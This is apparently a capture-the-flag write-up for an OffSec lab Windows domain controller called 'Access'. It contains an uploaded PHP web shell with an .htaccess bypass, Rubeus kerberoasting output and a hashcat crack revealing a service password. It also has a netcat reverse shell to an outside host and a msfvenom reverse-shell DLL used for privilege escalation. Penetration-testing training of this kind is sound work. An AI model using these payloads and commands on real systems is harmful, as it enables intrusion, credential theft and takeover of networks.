Access

Information Gathering

NMAP - Ports and Services

Nmap scan report for 192.168.142.187 (192.168.142.187)
Host is up (0.15s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-08 08:17:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap
443/tcp   open  ssl/http      Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: 400 Bad Request
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
49771/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-02-08T08:19:47
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 215.75 seconds

80 - HTTP

Manual Inspection

#Possible username

Brenden Legros
Hubert Hirthe
Cole Emmerich
Jack Christiansen
Alejandrin Littel
Willow Trantow

Road to user

file uploaded to /uploads

<?php

echo "<pre>";
echo system($_GET['cmd']);
echo "</pre>";

?>

.htaccess

AddType application/x-httpd-php .jpg

Kerberoasting


C:\xampp\htdocs\uploads>rubeus.exe kerberoast
rubeus.exe kerberoast

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : svc_mssql
[*] DistinguishedName      : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName   : MSSQLSvc/DC.access.offsec
[*] PwdLastSet             : 5/21/2022 5:33:45 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/[email protected]*$31
                             63ACC5C018C8809D3029A841911EE9$9D73EFC8AB6EA4833510EDDF1CFAC9A20F5032929F569F639
                             0C4374FAD4153B2BE42CF5E45182422E2B0741E2F71AEC09509D2D15DF5ED9F5DBC61DC6F5B67720
                             656B5AD060856677125985256570DD1B187B8056D2AB4043D5F1B9EC38C037D0BB743DD2328F5D86
                             967562D458BB6452B00253ECBCB00AB77FCBE889C4F24261BEC90FB8226E845E255FF8E7467536D8
                             04A1610E9AC7561073C0912C647FDD7B738C47C28937DAE927D7E20A8F616C3D616679813D90C9B0
                             2AC0332BB648EAFBE086BBDC101A5F86C15BAAA6E8D8BA09B5E93412E1052420C105CE5D4EC4F2CC
                             D33531537B3C07D5D0CE0284D9C4A6F00A9CE09304991ED419B13B67D1547D2890F76B7FDD02DE17
                             EE541C8F8FA21325AE122624A6B3AD6E7AC66EA649C69942C3E80E52AF734EC095835BDA9EFF0CFE
                             BC58F3FC01BB9C541A7A02294BF773DA3B9B9D2E411F36822A161BF5268C5B81F4970A39C42338CA
                             8ED9ED5A4C14E1026B10C794026C90825D72289A184847CBD5CFE7896A6CE29DBF9DA9F20413BE5B
                             CC071533ACC81322E85A567CF9C21E8D9A48C538823712C31E427F940019F40C3F050F7C357D52BA
                             BA2FFAEB12B20D3E2AB4A976558ED21F5F12007564FC9A6E0597B3CB27BAC8C24C3F8584A0DA6008
                             EA645BD84E689CCFAC5769B99C74745F3372ED86AD283F0BF75519AD32175FDAFD0BF8BBFC115207
                             7E84CBBF439BAE4F85333AD659B15347B87A9BD6F1974064B4CD6EA21663F03F7F12B33B6B609D87
                             19B357CDE8A1F795F3E3CFB37F430AEEF2A19F540041340A8C2EE7356BF28CEABF56F99464DF1714
                             7F1652D691B842E39FACC8CB28F818549A797DD2D6B898AE57C58EB38414C5D3D71585E78EDABE4A
                             DFB0E885EAC72D1670B5C08F112674A40600E0568D1C0BA2E1EED29395BFB6D5D7896997F0639E72
                             FB865F9905BF8C882B6265FAF9B8EBA325FFA2203CA8FFEB2CD4CCBF550094C1CB60584673628BC3
                             3B31B92AC548763FCA0F5B1F601625D85349CAEAED82A779B6F46C4BCBECE4D933217C0B2019C5F1
                             69476054C6385BDFCB6525F9CBFF3B348FA60CD65F8BDB74397B545F75230B893ABE8F130EAB752A
                             5193AE4768E33973A7841A7687F4CC81277B9937FA82096FF59C56DF4AEBC85209D4304528BB8B16
                             9E30601A27D7C469D64F2110A3E318D01A874F7E9314FF09AABD2141A8359A60374753452F26F2D3
                             03D895BB3730D03871AB039E70D06B9799F853C431CD033F2DCB5DA07A4E048BD39CABC8B40CF14B
                             C1657A262DB8856761A8FCD83FDAC6CE80ABA03D0B855A31CC8D2B0AF2F15C64D3B7BB01A2D8E6EB
                             E123A1A7F7E3A18C68464C6E9E7B9BE018A227A486A20FA5956FDE134C32EAD73BFD374F2E74C6AB
                             BD637C4464F71AE1C56DE54180EAE6F49B1E2A06877BE6CF2A0894802501AC54BC5D4F568D17EDFE
                             F08BABA43E7EBECBD641BD927DA28D03FBB341B6372A9523FD1D6FD77CE3AB83882FCF49C9803DA0
                             D92396B65B84AC80FB2CAFB4B2713AAC0DD822C46E3B22C30794943CA54E6229B8524DB3EB6A045B
                             BA5BA2CB6624F2F62B10E0F4529AEE1417FB1657D091D5759ABDF0E0BC78044D621

hashcat

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/[email protected]*$3163acc5c018c8809d3029a841911ee9$9d73efc8ab6ea4833510eddf1cfac9a20f5032929f569f6390c4374fad4153b2be42cf5e45182422e2b0741e2f71aec09509d2d15df5ed9f5dbc61dc6f5b67720656b5ad060856677125985256570dd1b187b8056d2ab4043d5f1b9ec38c037d0bb743dd2328f5d86967562d458bb6452b00253ecbcb00ab77fcbe889c4f24261bec90fb8226e845e255ff8e7467536d804a1610e9ac7561073c0912c647fdd7b738c47c28937dae927d7e20a8f616c3d616679813d90c9b02ac0332bb648eafbe086bbdc101a5f86c15baaa6e8d8ba09b5e93412e1052420c105ce5d4ec4f2ccd33531537b3c07d5d0ce0284d9c4a6f00a9ce09304991ed419b13b67d1547d2890f76b7fdd02de17ee541c8f8fa21325ae122624a6b3ad6e7ac66ea649c69942c3e80e52af734ec095835bda9eff0cfebc58f3fc01bb9c541a7a02294bf773da3b9b9d2e411f36822a161bf5268c5b81f4970a39c42338ca8ed9ed5a4c14e1026b10c794026c90825d72289a184847cbd5cfe7896a6ce29dbf9da9f20413be5bcc071533acc81322e85a567cf9c21e8d9a48c538823712c31e427f940019f40c3f050f7c357d52baba2ffaeb12b20d3e2ab4a976558ed21f5f12007564fc9a6e0597b3cb27bac8c24c3f8584a0da6008ea645bd84e689ccfac5769b99c74745f3372ed86ad283f0bf75519ad32175fdafd0bf8bbfc1152077e84cbbf439bae4f85333ad659b15347b87a9bd6f1974064b4cd6ea21663f03f7f12b33b6b609d8719b357cde8a1f795f3e3cfb37f430aeef2a19f540041340a8c2ee7356bf28ceabf56f99464df17147f1652d691b842e39facc8cb28f818549a797dd2d6b898ae57c58eb38414c5d3d71585e78edabe4adfb0e885eac72d1670b5c08f112674a40600e0568d1c0ba2e1eed29395bfb6d5d7896997f0639e72fb865f9905bf8c882b6265faf9b8eba325ffa2203ca8ffeb2cd4ccbf550094c1cb60584673628bc33b31b92ac548763fca0f5b1f601625d85349caeaed82a779b6f46c4bcbece4d933217c0b2019c5f169476054c6385bdfcb6525f9cbff3b348fa60cd65f8bdb74397b545f75230b893abe8f130eab752a5193ae4768e33973a7841a7687f4cc81277b9937fa82096ff59c56df4aebc85209d4304528bb8b169e30601a27d7c469d64f2110a3e318d01a874f7e9314ff09aabd2141a8359a60374753452f26f2d303d895bb3730d03871ab039e70d06b9799f853c431cd033f2dcb5da07a4e048bd39cabc8b40cf14bc1657a262db8856761a8fcd83fdac6ce80aba03d0b855a31cc8d2b0af2f15c64d3b7bb01a2d8e6ebe123a1a7f7e3a18c68464c6e9e7b9be018a227a486a20fa5956fde134c32ead73bfd374f2e74c6abbd637c4464f71ae1c56de54180eae6f49b1e2a06877be6cf2a0894802501ac54bc5d4f568d17edfef08baba43e7ebecbd641bd927da28d03fbb341b6372a9523fd1d6fd77ce3ab83882fcf49c9803da0d92396b65b84ac80fb2cafb4b2713aac0dd822c46e3b22c30794943ca54e6229b8524db3eb6a045bba5ba2cb6624f2f62b10e0f4529aee1417fb1657d091d5759abdf0e0bc78044d621:trustno1

Lateral Movement

Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "nc.exe 192.168.45.217 1337 -e cmd.exe"

PrivESC

\SeManageVolumeExploit.exe

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.217 LPORT=1337 --platform windows -f dll -o Printconfig.dll 
copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\

powershell
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

Machine Recap

Nmap Ports and Services Scan
Unrestricted File Upload
1. Bypassing php execution using .htaccess
melakukan keberoasting dengan rubeus.exe
mendapatkan svc_mssql hash
melakukan cracking svc_mssql hash dengan hashcat
melakukan Lateral Movement dengan Invoke-RunasCs
1. melakukan privilege escalation dengan abuse SeManagerVolumeExploitprivilege

PreviousButch NextHeist

Last updated 10 months ago